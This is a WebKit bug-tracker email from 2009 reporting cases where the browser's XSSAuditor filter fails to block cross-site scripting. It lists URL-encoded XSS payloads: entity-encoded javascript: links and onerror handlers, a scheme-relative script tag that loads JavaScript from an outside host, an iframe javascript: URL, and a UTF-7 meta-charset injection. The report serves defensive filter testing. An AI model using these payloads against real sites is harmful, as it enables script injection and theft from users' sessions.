[Webkit-unassigned] [Bug 26708] New: XSSAuditor false negatives
bugzilla-daemon at webkit.org
bugzilla-daemon at webkit.org
Wed Jun 24 21:57:12 PDT 2009
https://bugs.webkit.org/show_bug.cgi?id=26708
Summary: XSSAuditor false negatives
Product: WebKit
Version: 528+ (Nightly build)
Platform: All
OS/Version: All
Status: NEW
Severity: Normal
Priority: P2
Component: WebCore JavaScript
AssignedTo: webkit-unassigned at lists.webkit.org
ReportedBy: abarth at webkit.org
CC: sam at webkit.org, dbates at berkeley.edu
Gareth Heyes has been look at our XSSAuditor and found a number of false
negatives. We should fix them:
HTML entities:
test.php?x=%3Ca%20href%3D%26%23x0000006a%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3a%26%23x61%26%23x6c%26%23x65%26%23x72%26%23x74%26%23x28%26%23x31%26%23x29%3Etest%3Ca%3E
test.php?x=%3Cimg%20src=1%20onerror=%26%2397%26%23108%26%23101%26%23114%26%23116%26%2340%26%2349%26%2341%3E
Scheme relative paths:
test.php?x=%3Cscript%20src=//businessinfo.co.uk/labs/xss/xss.js%3E%3C/script%3E
iframe + JavaScript URL:
test.php?x=%3Ciframe%20src=javascript:alert(document.domain)%3E
HTTP-Equiv UTF-7:
test.php?x=%3Cmeta%20http-equiv=%22Content-Type%22%20content=%22text/html;%20charset=UTF-7%22%20/%3E%2bADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAPAAvAHMAYwByAGkAcAB0AD4-
--
Configure bugmail: https://bugs.webkit.org/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug, or are watching the assignee.
More information about the webkit-unassigned
mailing list